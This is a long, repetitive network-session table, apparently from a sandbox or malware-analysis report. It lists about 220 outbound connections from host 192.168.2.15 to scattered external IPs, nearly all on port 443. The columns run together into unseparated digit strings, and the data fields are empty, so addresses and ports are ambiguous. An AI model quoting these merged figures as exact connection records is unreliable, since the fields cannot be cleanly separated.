                                            22504192.168.2.1543392118.51.109.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22505192.168.2.1554242138.233.85.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22506192.168.2.1541332108.197.222.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22507192.168.2.153918413.153.148.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22508192.168.2.1556890170.206.236.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22509192.168.2.1542510165.213.131.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22510192.168.2.1540052216.19.190.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22511192.168.2.1553494200.238.193.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22512192.168.2.1538730117.63.34.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22513192.168.2.1549098219.19.19.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22514192.168.2.154849259.250.130.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22515192.168.2.153356444.151.29.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22516192.168.2.1553906180.31.74.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22517192.168.2.155916227.27.27.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22518192.168.2.153503266.8.99.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22519192.168.2.1548774113.255.116.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22520192.168.2.1556372216.180.26.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22521192.168.2.155526265.49.215.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22522192.168.2.1539568192.159.15.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22523192.168.2.1559134108.47.75.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22524192.168.2.1541568100.167.107.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22525192.168.2.1542022140.229.92.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22526192.168.2.1545246139.123.228.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22527192.168.2.1555772104.127.211.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22528192.168.2.1551230184.66.65.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22529192.168.2.1533268176.53.104.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22530192.168.2.1534530166.227.99.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22531192.168.2.153928895.7.247.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22532192.168.2.1558780131.10.155.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22533192.168.2.1534900216.194.28.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22534192.168.2.153938883.166.147.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22535192.168.2.1534018138.123.238.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22536192.168.2.154706649.89.2.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22537192.168.2.1555076171.33.233.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22538192.168.2.1544054216.174.116.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22539192.168.2.153668067.127.209.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22540192.168.2.1549416124.87.113.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22541192.168.2.15405582.142.161.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22542192.168.2.1534828123.60.0.2508080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22543192.168.2.153935454.244.228.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22544192.168.2.1532954132.36.78.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22545192.168.2.1545856142.62.58.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22546192.168.2.1553732184.59.62.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22547192.168.2.1560694170.109.227.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22548192.168.2.1545660110.172.212.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22549192.168.2.1551828186.60.3.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22550192.168.2.154282873.170.161.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22551192.168.2.154817683.78.68.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22552192.168.2.154495261.109.117.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22553192.168.2.154355273.54.30.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22554192.168.2.155215058.40.166.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22555192.168.2.155467499.143.191.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22556192.168.2.153286461.40.97.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22557192.168.2.1560228174.140.123.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22558192.168.2.1547250114.101.204.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22559192.168.2.1546864122.32.58.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22560192.168.2.1541598199.158.162.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22561192.168.2.1553640218.186.172.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22562192.168.2.1541224131.100.84.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22563192.168.2.1546048124.171.62.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22564192.168.2.1551356170.161.84.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22565192.168.2.1546900185.178.96.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22566192.168.2.1555982129.210.6.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22567192.168.2.1547878108.97.151.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22568192.168.2.155283249.33.183.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22569192.168.2.154495074.247.0.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22570192.168.2.1539790110.161.97.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22571192.168.2.155536260.156.147.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22572192.168.2.153771266.101.127.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22573192.168.2.1552630141.211.94.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22574192.168.2.1544184103.64.141.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22575192.168.2.1559140186.174.160.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22576192.168.2.155758041.18.194.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22577192.168.2.1551070194.105.23.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22578192.168.2.153338218.9.141.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22579192.168.2.1549816102.13.132.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22580192.168.2.1546664152.81.233.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22581192.168.2.1559944167.10.50.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22582192.168.2.1552518109.126.42.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22583192.168.2.1550172175.111.123.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22584192.168.2.1540526168.228.17.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22585192.168.2.1539376150.148.211.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22586192.168.2.155115842.71.46.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22587192.168.2.1541022216.116.49.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22588192.168.2.155530086.11.101.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22589192.168.2.1547438212.19.168.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22590192.168.2.1539748138.243.99.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22591192.168.2.154223681.95.113.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22592192.168.2.154545464.41.80.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22593192.168.2.1544364220.252.65.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22594192.168.2.1540558109.137.105.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22595192.168.2.1532916160.126.194.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22596192.168.2.1546162138.137.79.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22597192.168.2.155176898.21.114.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22598192.168.2.1542316203.32.135.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22599192.168.2.1551754182.152.217.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22600192.168.2.154552053.53.202.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22601192.168.2.155788250.140.156.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22602192.168.2.1536224223.150.43.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22603192.168.2.1560922163.145.89.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22604192.168.2.1549726122.34.0.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22605192.168.2.155685814.81.235.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22606192.168.2.1534118130.57.201.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22607192.168.2.1559072152.233.183.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22608192.168.2.1534622136.9.97.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22609192.168.2.1538920168.229.121.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22610192.168.2.154683239.238.81.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22611192.168.2.1541550164.0.122.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22612192.168.2.153888470.59.162.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22613192.168.2.1535782107.26.62.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22614192.168.2.155256860.251.148.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22615192.168.2.1536130162.196.15.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22616192.168.2.155009625.238.229.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22617192.168.2.1534950122.56.144.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22618192.168.2.153980473.91.174.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22619192.168.2.1552966161.89.20.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22620192.168.2.154214884.175.222.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22621192.168.2.1550226188.254.247.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22622192.168.2.1553714222.102.122.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22623192.168.2.1554024102.95.14.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22624192.168.2.1541652155.72.115.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22625192.168.2.1537312210.248.81.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22626192.168.2.153437682.204.174.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22627192.168.2.1547754170.144.146.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22628192.168.2.1560614185.188.52.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22629192.168.2.1533992172.52.237.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22630192.168.2.1557998128.74.177.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22631192.168.2.1541226132.142.231.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22632192.168.2.155583693.95.166.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22633192.168.2.153405494.55.170.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22634192.168.2.1536362154.26.56.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22635192.168.2.1556960122.45.117.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22636192.168.2.156069297.215.3.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22637192.168.2.154045479.182.240.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22638192.168.2.1548522147.226.68.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22639192.168.2.1542910142.178.88.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22640192.168.2.1551382198.110.228.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22641192.168.2.1540246148.143.48.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22642192.168.2.1535360104.192.96.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22643192.168.2.1554114158.24.218.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22644192.168.2.155481845.176.105.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22645192.168.2.155349291.173.170.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22646192.168.2.1546470176.189.87.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22647192.168.2.155809472.64.181.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22648192.168.2.1545544202.48.20.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22649192.168.2.155682436.117.148.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22650192.168.2.154292680.12.109.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22651192.168.2.155712824.251.23.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22652192.168.2.1535550139.113.53.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22653192.168.2.155903459.225.47.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22654192.168.2.1549998210.1.50.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22655192.168.2.1540116179.238.22.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22656192.168.2.1552818169.221.187.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22657192.168.2.1533630116.246.123.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22658192.168.2.153677052.62.39.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22659192.168.2.155436293.98.52.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22660192.168.2.153321480.181.121.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22661192.168.2.153773052.16.236.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22662192.168.2.15530608.217.150.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22663192.168.2.15408348.28.23.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22664192.168.2.1556998124.80.136.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22665192.168.2.1545964116.24.236.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22666192.168.2.1552778105.26.79.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22667192.168.2.1547468150.92.94.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22668192.168.2.153296689.143.224.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22669192.168.2.1545592146.127.14.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22670192.168.2.155241264.53.58.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22671192.168.2.155706648.106.128.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22672192.168.2.1539768196.104.183.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22673192.168.2.153344669.86.191.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22674192.168.2.1540272148.58.198.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22675192.168.2.155216259.26.143.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22676192.168.2.1552054128.45.15.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22677192.168.2.1554588179.155.192.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22678192.168.2.1558138120.193.127.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22679192.168.2.1552230126.190.140.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22680192.168.2.1533844114.83.136.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22681192.168.2.154646688.118.24.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22682192.168.2.1543964157.17.153.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22683192.168.2.1549970213.145.216.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22684192.168.2.1536964187.165.157.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22685192.168.2.1545142118.85.152.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22686192.168.2.15442008.52.230.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22687192.168.2.1545750139.126.106.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22688192.168.2.154541824.202.166.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22689192.168.2.1549854138.172.236.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22690192.168.2.1537060179.255.140.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22691192.168.2.154813686.64.206.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22692192.168.2.153445299.203.121.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22693192.168.2.154969873.219.130.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22694192.168.2.1538664200.199.240.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22695192.168.2.1539604103.57.231.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22696192.168.2.153676223.185.1.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22697192.168.2.153420075.44.6.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22698192.168.2.1557588132.87.68.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22699192.168.2.1539784205.56.62.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22700192.168.2.1546728223.124.4.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22701192.168.2.1538288155.85.20.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22702192.168.2.1548948186.64.82.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22703192.168.2.153978031.190.27.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22704192.168.2.1557456184.129.213.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22705192.168.2.1553600130.105.248.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22706192.168.2.1547632209.48.81.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22707192.168.2.1540308184.62.128.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22708192.168.2.155169039.106.18.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22709192.168.2.1550104217.9.230.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22710192.168.2.1541806133.213.141.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22711192.168.2.154881087.50.135.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22712192.168.2.155050874.175.13.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22713192.168.2.1541280109.70.28.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22714192.168.2.156018443.229.171.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22715192.168.2.1541284121.38.24.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22716192.168.2.1558080169.12.97.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22717192.168.2.155555618.100.242.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22718192.168.2.154549293.27.114.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22719192.168.2.153541493.77.169.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22720192.168.2.1533590201.250.230.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22721192.168.2.15600408.109.146.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22722192.168.2.1547232219.3.55.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22723192.168.2.1536114123.229.94.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22724192.168.2.1542746195.109.0.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22725192.168.2.155281476.48.13.14443
                                            TimestampBytes transferredDirectionData


